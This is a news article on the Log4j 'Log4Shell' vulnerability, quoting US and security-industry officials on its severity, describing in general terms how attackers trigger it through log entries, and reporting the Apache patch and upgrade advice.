Digital devices worldwide could be exposed to software flaws that hackers are actively exploiting, US officials have warned.

The vulnerability is in Java-based software known as ‘Log4j’ that some of the world’s biggest tech firms use to log information to their applications.

Amazon Web Services and IBM have already moved to address the flaw, which could allow hackers access to computer servers and, thereafter, to an entire network.

‘Most serious’ vulnerability

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), said.

“We expect the vulnerability to be widely exploited by sophisticated actors, and we have limited time to take necessary steps in order to reduce the likelihood of damaging incidents,” she added.

The security flaw poses a “severe risk” to the internet, Easterly said. “This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use.”

‘On fire’

The problem with Log4j was first noticed in the video game Minecraft, but its impact for other web applications quickly became apparent. The software is used in millions of applications, including Apple’s iCloud. 

Attacks exploiting the bug, known as ‘Log4Shell’ attacks, have been happening since 9 December, says Adam Meyers of security company Crowdstrike. “The internet’s on fire right now.” 

It could take weeks to address the vulnerabilities.

Security fix

The Apache Software Foundation, which manages the Log4j software, has released a security fix for organisations to apply – but it’s not fail-safe, as it can be reversed relatively easily. 

CISA says that it will set up a public website with information on what software products have been affected by the vulnerability, and the techniques that hackers are using to exploit it, in order to counteract misinformation on social media.  

The Computer Emergency Response Team (CERT) for New Zealand and others have reported that attackers are actively looking for servers vulnerable to Log4Shell attacks. These efforts will continue – and expand – so addressing the vulnerability as soon as possible is critical.

To ensure prevention of attack, CERT recommends users to upgrade all Log4j versions to ‘Log4j-2.15.0’ or later.

What exactly is Log4j?

Almost all of the software we use keeps records of errors and other significant events, known as ‘logs’. Rather than creating their own logging system, many software developers use the open source Log4j, making it one of the most common logging packages in the world.

The popularity of Log4j has now become a liability, however. The flaw affects millions of pieces of software, running on millions of machines, which everyone interacts with.

Malicious code

Attackers can trick Log4j into running malicious code by forcing it to store a log entry that includes a particular string of text.

How hackers are doing this varies from program to program but, in Minecraft, it has been reported that this is being done via chat boxes. A log entry is created to archive each of these messages, so if the dangerous string of text is sent from one user to another, it will be implanted into a log.

In another case, Apple servers were found to create a log entry, recording the name given to an iPhone by its owner in settings.

Once hackers created this log entry, the attacker could then run any code they liked on the server, including stealing or deleting sensitive data.